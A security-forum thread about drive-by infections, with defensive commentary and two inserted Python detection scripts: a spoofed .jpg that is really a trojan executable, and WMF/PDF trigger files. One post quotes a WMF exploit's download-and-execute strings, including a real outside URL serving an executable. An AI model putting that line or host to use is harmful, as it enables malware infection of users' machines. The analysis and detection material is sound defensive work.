ABC of how people easily get infected

Discussion in 'malware problems & news' started by CloneRanger, Jul 10, 2010.

Thread Status:
Not open for further replies.
  1. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    In an .exe for sure

    Definitely.

    I still don't know what the ban00.jpg detect facts are. No .jpg showed up when I visited the www. The www is still live with the same MZ code, as I just tested it with IE6 :eek: I'm going to email them and let them know :)

    It looks like "some" kind of spoofing is happening!
     
  2. SIR****TMG

    SIR****TMG Registered Member

    Joined:
    May 31, 2004
    Posts:
    833
    Surely a delight to read this thread indeed... :)
     
  3. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    CONFIRMED Nasty :eek:

    ban00.jpg is 100% malware, as I expected it was and the earlier analysis indicated. Grabbed it out of my cache, 177 kbytes, and uploaded it to VT.

    [attachment: jpg.gif]

    Result: 37/42 (88.10%). It's a nasty ZBot/Sinowal-type Trojan Spy.

    The interesting thing is, its extension is .jpg so it is spoofed as one, but it actually is an .exe ;) Not sure how they expected it would run as it is :D

    I did email the company, so we might hear something soon.
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    It can't be run by the user who downloads it directly, because Windows File Associations will call the user's default application for .jpg, which will generate an error message.

    Please see my post #22 above.

    It's only a guess in this case, but often these spoofed executables sit on a server somewhere to be called in a remote code execution exploit.

    Here is an old one, where the spoofed file extension is .gif:

    http://www.urs2.net/rsj/computing/tests/redirect


    ----
    rich
     
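The point in the two posts above is that the extension decides what Windows does on a double-click, while the first bytes decide what the file really is. Below is an added example (not code posted by anyone in this thread) that makes that check explicit: it reads the MZ header and follows e_lfanew to the "PE\0\0" signature, and flags a file whose name claims an image but whose content is a Windows executable. The sample bytes are constructed in-line (a minimal MZ/PE stub and real JPEG/GIF headers); they are not the ban00.jpg sample discussed above, and the filenames are illustrative only.

```python
"""Detect an executable hiding behind an image extension.

Added example for this thread, not code posted by anyone in it. The bytes
built here are constructed (a minimal MZ/PE stub and image headers), not the
ban00.jpg sample discussed in the thread.
"""
import struct

# Content signatures for the image types the spoof pretends to be.
MAGIC = {
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "png": [b"\x89PNG\r\n\x1a\n"],
}


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff(data: bytes) -> str:
    """Return the type implied by the content bytes, or 'unknown'."""
    if is_pe(data):
        return "exe"
    for ext, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return ext
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims an image but the content is a PE executable."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in MAGIC and sniff(data) == "exe"


def build_fake_pe() -> bytes:
    """Constructed minimal DOS stub plus PE signature, enough to exercise is_pe()."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> right after the DOS header
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    samples = {                                # all constructed, hypothetical names
        "ban00.jpg": build_fake_pe(),
        "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
        "anim.gif": b"GIF89a" + b"\x00" * 10,
    }
    for name, blob in samples.items():
        print(f"{name:12} content={sniff(blob):8} mismatch={extension_mismatch(name, blob)}")
```

Run against a browser cache directory, a mismatch on a ".jpg" is exactly the signal VirusTotal confirmed by hand in this thread; the file is harmless to double-click (the image viewer rejects it) but is ready to be renamed and launched by whatever exploit fetched it.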
  5. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Indeed ;)

    I had considered that, good point :thumb:

    Nice example :)

    Haven't heard back from Hollywood yet? I'm ready for my close-up, Mr. DeMille :D

    Edit - It's still got the nasty on it :(
     
  6. ABee

    ABee Registered Member

    Joined:
    Jun 2, 2010
    Posts:
    330
  7. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Originally Posted by ABee

    Funny as it sounds, lots of people are click-happy and just don't have a clue, which is why they not only get infected, but keep on doing so :(
     
  8. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,944
    Location:
    USA
    I've seen experienced people say things like, "Oh that site is okay, I go there all the time", when in fact it isn't okay. My only conclusion then, is that sometimes it doesn't matter how much one knows (or how much one thinks one knows), there is an ever-present danger of infection no matter which sites you visit, and no matter how many times you have visited them before without a problem.
     
  9. ABee

    ABee Registered Member

    Joined:
    Jun 2, 2010
    Posts:
    330
    Sure. Also why 20% of users are carrying around 90% of the infections. (IMO, and just to use some numbers pulled out of a hat.)
     
  10. wearetheborg

    wearetheborg Registered Member

    Joined:
    Nov 14, 2009
    Posts:
    667
    Thanks. Reading the analysis, it seems that the download of the gif file, the renaming to exe, and starting of the exe file is all done automatically. Is that correct?
    So visiting the infected site is all that takes? I had been under the impression that the user had to intervene for the virus/trojan to get installed.
    PS: In the test above, what blocked the download? Windows or a third party software?



    Regarding infected media files: say the user has a policy of always right-clicking and using "open by", and then never downloading from any pop-ups etc.
    Does this strategy protect against all media malware?
     
  11. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes.

    When a user visits a site that has a drive-by download, either the browser or a 3rd party application, such as a PDF reader, must have a vulnerability that can be exploited. If all conditions are met, then no user intervention is necessary.

    Third party software -- several years ago I used this exploit as a test and several people tested various solutions, including the one I used above, Faronics Anti-Executable.

    http://www.urs2.net/rsj/computing/tests/remote/

    I use the word "solution" because Software Restriction Policies is not a product, but part of the Operating System. There are many newer solutions/products since I tested those, that provide the same protection.

    I've never seen an infected media file exploit in the wild to test, so I cannot answer your question.

    Do you know of one?

    regards,

    rich
     
  12. wearetheborg

    wearetheborg Registered Member

    Joined:
    Nov 14, 2009
    Posts:
    667
    No, I do not; but I do not have much experience with security issues.
     
  13. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Perhaps you are referring to exploits that use media files as a trigger to download malware.

    An old remote code execution exploit used a .wmf file. Code was inserted into the file to download the malware:

    Code:
    GetProcAddress-LoadLibrary-GetSystemDirectory-
    urlmon.dll-URLDownloadToFile-WinExec-
    HTTP://195.225.177.33/vx/win32.exe
    So, the .wmf file is not the malware itself, rather, just a file that triggers the exploit.

    PDF files work the same way. Here is similar code in a PDF file:

    [attachment: wepawet_2.gif]

    REFERENCES

    Microsoft Windows GDI WMF File Handling Buffer Overflow Vulnerability
    http://tools.cisco.com/security/center/viewAlert.x?alertId=17157
    December 09, 2008
    Adobe Flash zero-day attack
    http://www.zdnet.com/blog/security/...k-underway-harden-pdf-reader-immediately/3773
    Because this is a remote code execution exploit, running as LUA or having execution protection such as SRP or a 3rd-party product nullifies it: the malware cannot execute on the victim's machine.


    ----
    rich
     
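The string listing in the post above (GetProcAddress, LoadLibrary, URLDownloadToFile, WinExec, a URL) is what a download-and-execute stub looks like when pulled out of a trigger file. Below is an added example, not code from any poster here, that automates that triage: it extracts printable strings from a blob, looks for the Win32 imports that together spell "fetch a file and run it", pulls out URLs, and only calls the file a downloader when it finds a fetch primitive, an execute primitive and a URL. The blob is constructed to mirror the shape of the listing; the URL host is RFC 5737 documentation space, not the address quoted in the thread.

```python
"""Triage a suspect trigger file for download-and-execute indicators.

Added example for this thread (not code from any poster). The blob below is
constructed: binary filler interleaved with the kind of strings the WMF
listing in the thread shows. 192.0.2.10 is RFC 5737 TEST-NET-1, used here as
a stand-in for the real download host.
"""
import re

# Win32 imports that, together, form a downloader: resolve APIs, fetch, run.
DOWNLOADER_APIS = {
    "LoadLibrary", "GetProcAddress", "GetSystemDirectory",
    "URLDownloadToFile", "WinExec", "ShellExecute", "CreateProcess",
}
URL = re.compile(rb"(?i)https?://[\w.\-]+(?::\d+)?(?:/[\w./\-%?=&]*)?")


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Runs of at least min_len printable ASCII bytes, like the strings(1) tool."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def find_download_indicators(data: bytes) -> dict:
    """Return the downloader API names and URLs found, plus an overall verdict."""
    strings = extract_strings(data)
    # Substring match so the A/W suffixed imports (WinExec has none) still hit.
    apis = sorted({api for s in strings for api in DOWNLOADER_APIS if api in s})
    urls = sorted({m.group().decode("ascii") for m in URL.finditer(data)})
    fetch = {"URLDownloadToFile"} & set(apis)
    run = {"WinExec", "ShellExecute", "CreateProcess"} & set(apis)
    return {
        "apis": apis,
        "urls": urls,
        # Verdict requires all three pieces, so a plain PE that merely
        # imports CreateProcess is not flagged.
        "downloader": bool(fetch and run and urls),
    }


def build_sample() -> bytes:
    """Constructed blob: filler bytes interleaved with the strings of interest."""
    parts = [
        b"\x01\x00\x09\x00\x00\x03",          # placeholder header bytes, constructed
        b"GetProcAddress\x00", b"\x90" * 7, b"LoadLibraryA\x00",
        b"GetSystemDirectoryA\x00", b"\x00" * 5, b"urlmon.dll\x00",
        b"URLDownloadToFileA\x00", b"WinExec\x00",
        b"http://192.0.2.10/vx/win32.exe\x00",
    ]
    return b"".join(parts)


if __name__ == "__main__":
    report = find_download_indicators(build_sample())
    for key, value in report.items():
        print(f"{key}: {value}")
```

The verdict logic is deliberately conservative: the combination of a fetch API, an execute API and a URL in a file that is supposed to be a picture or a document is the signal, not any one of them alone. The URL it recovers is the secondary payload host, which is the thing to block or report.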
  14. vasa1

    vasa1 Registered Member

    Joined:
    May 1, 2010
    Posts:
    4,417
    I think the Pareto principle has 20% and 80% :)
     
  15. ABee

    ABee Registered Member

    Joined:
    Jun 2, 2010
    Posts:
    330
    Yep, sounds about right.

    I'd never heard of that one. Thanks for the info.
    So I looked it up on Wikipedia and got this quote:

    Which no doubt holds basically true for Windows security patches as well.
    Install the 15, 20, or 25% most 'important' ones (or whatever word you prefer to use), and you've put the kibosh on a pretty large majority of exploit vulnerabilities.

    I and many others have noted here and elsewhere how doing just three simple things-- getting behind a router, keeping patches up to date, and surfing from a LUA-- will vastly help reduce exposure to malware exploitations.
    Obviously, there are many other things the user can also do to mollify exploit exposure, but just those three things by themselves represent a goodly portion of an effective defense.
    Yet so many are either unwilling to put forth that little effort, or uneducated as to how important/necessary/effective it is.

    C'est la vie.
     
  16. wearetheborg

    wearetheborg Registered Member

    Joined:
    Nov 14, 2009
    Posts:
    667
    Thanks Rich, that answers my question. The "Open by" ... procedure does not protect.

    I also found this to be useful (taken from Pedro's post):
    http://www.uzipaz.com/eng/safe.html
     
  17. Dude111

    Dude111 Registered Member

    Joined:
    Sep 30, 2008
    Posts:
    212
    Just tried to load the site and it doesn't load :(
     
  18. wearetheborg

    wearetheborg Registered Member

    Joined:
    Nov 14, 2009
    Posts:
    667
    What site?
     